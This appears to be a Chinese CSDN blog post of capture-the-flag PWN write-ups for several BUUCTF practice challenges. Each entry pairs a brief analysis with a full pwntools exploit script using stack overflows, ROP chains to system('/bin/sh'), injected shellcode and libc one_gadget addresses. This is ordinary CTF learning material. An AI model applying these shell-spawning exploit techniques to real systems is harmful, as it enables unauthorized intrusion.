BUUCTF-PWN刷题日记(二)

最新推荐文章于 2024-02-05 22:00:44 发布
最新推荐文章于 2024-02-05 22:00:44 发布
阅读量310 收藏
点赞数
分类专栏: BUUCTF CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45461609/article/details/106135092
版权
本文记录了作者在不同CTF比赛中的PWN题解,涉及栈溢出、ROP技术以及利用libc计算gadget等技巧,包括ciscn_2019_n_8、not_the_same_3dsctf_2016、[HarekazeCTF2019]baby_rop、jarvisoj_level2、one_gadget和bjdctf_2020_babystack等挑战。
摘要由CSDN通过智能技术生成

BUUCTF-PWN刷题日记

ciscn_2019_n_8

送分题…

'''
Author:3nc0de
Date:2020/05/15
'''

from pwn import *

r = process('./pwn')
#r = remote('node3.buuoj.cn', port)

payload=p32(0x11)*14
r.sendline(payload)

r.interactive()

not_the_same_3dsctf_2016

main函数中存在栈溢出,get_secret()函数将flag放进了fl4g所在的数据段
程序中有write()函数,所以可以用write()将flag打印出来
在这里插入图片描述
在这里插入图片描述
exp1:

'''
Author:3nc0de
Date:2020/05/15
'''

from pwn import *

r = remote('node3.buuoj.cn', port)
#r = process('./pwn')
elf = ELF('./pwn')

write = elf.sym['write']
secret = 0x080489A0
flag = 0x080ECA2D

payload = 'a'*0x2d
payload += p32(secret)
payload += p32(write)
payload += p32(0xdeadbeef)
payload += p32(1)
payload += p32(flag)
payload += p32(45)

r.sendline(payload)

r.interactive()

看了一下别人的WP,有另一种写法,于是我也试了一下,跟get_started_3dsctf_2016思路一模一样,不累述了。上次用的gets,这次就用read来写吧,反正思路都一样的。
exp2:

'''
Author:3nc0de
Date:2020/05/15
'''

from pwn import*

r = process('./pwn')
r = remote('node3.buuoj.cn', 28678)
elf = ELF('./pwn')

mprotect = elf.sym['mprotect']
pop3ret = 0x80483b8
data = 0x080eb000
#gets = elf.sym['gets']
read = elf.sym['read']

payload = 'a'*0x2d
payload += p32(mprotect)
payload += p32(pop3ret)
payload += p32(data)
payload += p32(0x2000)
payload += p32(7)
'''
payload += p32(gets)
payload += p32(data+0x1000)
payload += p32(data+0x1000)
'''
payload += p32(read)
payload += p32(data+1000)
payload += p32(0)
payload += p32(data+1000)
payload += p32(0x100)

r.sendline(payload)
sleep(1)
r.sendline(asm(shellcraft.sh()))
r.interactive()

[HarekazeCTF2019]baby_rop

通过scanf造成溢出修改返回地址。
发现程序中有/bin/sh字符串。
在这里插入图片描述

'''
Author:3nc0de
Date:2020/5/29
'''
from pwn import*

#r = process('./babyrop')
r = remote('node3.buuoj.cn', port)

pop_rdi = 0x400683
binsh = 0x601048
system = 0x400490

payload = 'a'*0x18
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
payload += p64(0xdeadbeef)

r.sendline(payload)
r.interactive()

我打通之后发现flag并不在当前目录下,而是在/home/babyrop目录下,找找就找到了。

jarvisoj_level2

在这里插入图片描述
就最基本的栈溢出叭,system和/bin/sh都可以找到

'''
Author:3nc0de
Date:2020/5/29
'''
from pwn import*

r = remote('node3.buuoj.cn', 28693)
#r = process('./level2')
elf = ELF('./level2')

binsh = 0x0804a024

payload = 'a'*(0x88+4)
payload += p32(elf.plt['system'])
payload += p32(0xdeadbeef)
payload += p32(binsh)

r.sendline(payload)
r.interactive()

one_gadget

在这里插入图片描述
在init()函数中发现它打印了printf()函数的真实地址,并且题目提供了libc,那就可以通过这两者算出libc_base
在这里插入图片描述
在main函数中发现v4是函数指针,我们可以通过将函数地址/ropchain/gadget发送给函数指针来达到调用的目的。
根据题目需要使用one_gadget工具。one_gadget 是glibc里调用execve(’/bin/sh’, NULL, NULL)的一段非常有用的gadget。
具体用法:

one_gadget libc.xx.xx

在这里插入图片描述
找到了四处one_gadget,可以一个一个试
EXP:

#coding:utf-8
from pwn import*

one_gadget = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]

for gadget in one_gadget:
    #r = process('./one_gadget')
    r = remote('node3.buuoj.cn', port)
    libc = ELF('./libc-2.29.so')

    printf_addr = int(r.recvline()[-13:-1], 16)

    libc_base = printf_addr - libc.sym['printf']

    payload = libc_base + gadget
    r.sendline(str(payload))
    try:
        r.interactive()
        #在出现GOT EOF错误之后记得Ctrl+C终止当前的interactive()进入下一轮send
    except Exception as e:
        r.close()

bjdctf_2020_babystack

一道十分普通的栈溢出题
exp:

'''
Date:2020/6/11
Author:3nc0de
'''
from pwn import*
#r = process('./bjdctf_2020_babystack')
r = remote('node3.buuoj.cn', port)
r.sendlineafter('name:\n', '100')
payload = 'a'*(0x10+8) + p64(0x4006e6)
r.sendlineafter('name?\n', payload)
r.interactive()

jarvisoj_level2_x64

64位栈溢出,注意寄存器传参就好了
exp:

#coding:utf-8
from pwn import*
#r = process('./level2_x64')
r = remote('node3.buuoj.cn', 29537)
e = ELF('./level2_x64')
pop_rdi = 0x4006b3
system_addr = e.sym['system']
binsh = 0x600a90

#r.recvuntil("Input:")
payload = 'a'*(0x80+8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system_addr)
payload += p64(0xdeadbeef)

r.sendline(payload)
r.interactive()
3nc0de
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 411
buuctf-pwn 001-016wp
buuctfpwn(2~10)
yw__y的博客
03-30 1008
BUUCTF PWN(2)
qq_60794823的博客
09-28 208
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1726
[BUUCTF]-rip 目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
持续更新 BUUCTF——PWN
weixin_41748164的博客
12-14 414
buuctf pwn 第三页
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
buuctf-pwn刷题
CHAWUCIREN1的博客
10-15 2074
ciscn_2019_n_1 直接运行一波 猜数字的 checksec file一下 放入ida 发现func函数里面有 东西 这个是一道溢出,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值 查看一下栈空间 我们发现v2在栈上04的位置,也就是(0x30-4) 11.28125转化为十六进制为0x41348000 pay load= b’A’*(0x30-4) + p64(0x41348000) from pwn import * payload =
BUUCTF pwn2_sctf2016
红叶的博客
11-01 488
难点:绕过字符串大小限制以及是否掌握了ret2libc。
buuctf pwn2
最新发布
2301_80477504的博客
02-05 1267
原理顾名思义,ret to syscall,就是调用系统函数以达到getshell的目的在计算中,系统调用是一种编程方式,计算机程序从该程序中向执行其的操作系统内核请求服务。这可能包括与硬件相关的服务(例如,访问硬盘驱动器),创建和执行新进程以及与诸如进程调度之类的集成内核服务进行通信。系统调用提供了进程与操作系统之间的基本接口。至于系统调用在其中充当什么角色,稍后再看,现在我们要做的是:让程序调用execve(“/bin/sh”,NULL,NULL)函数即可拿到shell。
BUUCTF-pwn(2)
njh18790816639的博客
11-06 542
[第五空间2019 决赛]PWN5 该函数漏洞比较明显,进行调试验证! 并且没有开启PIE保护措施,所以我们可以利用任意地址写,写入.bss:0804C044 password该地址处数据即可。 然后密码就被操控了。 [OGeek2019]babyrop 将urandom中一个随机数写入到buf中,然后作为参数传入到下一个函数中。 必须通过条件才可以可利用到下面的栈溢出漏洞!而且read还可以溢出一个字节到v5上。这里strlen遇到’\x00‘停止检测,所有外面可以利用该特征,绕过检测!
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 469
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
buuctf|pwn-ciscn_2019_ne_5-wp
l2645470582_的博客
11-09 216
1.例行检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串 我们看到flag就是我们输入的log 3.我们看看main函数里面有什么 我们看到第一个条件s1 == 'administrator' 进入过后,v3是你想要选择执行的内容 ADDLog():我们看到这里是输入log,跟我们的flag有关系 a1是我们外面传进来的src = 48,读取128个就造成了溢出 ...
BUUCTF pwnexp整合
菜的只能随便写写博客
02-29 660
0x01 rip from pwn import* p = remote('node3.buuoj.cn',27511) payload = 'a'*23+p64(0x401198)+p64(0x401186) p.sendline(payload) p.interactive()   0x02 warmup_csaw_2016 from pwn import * #p = proces...
buuctf中的一些pwn总结(不断更新)
PLpa的博客
08-19 4515
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解思路 由于此存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 561
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值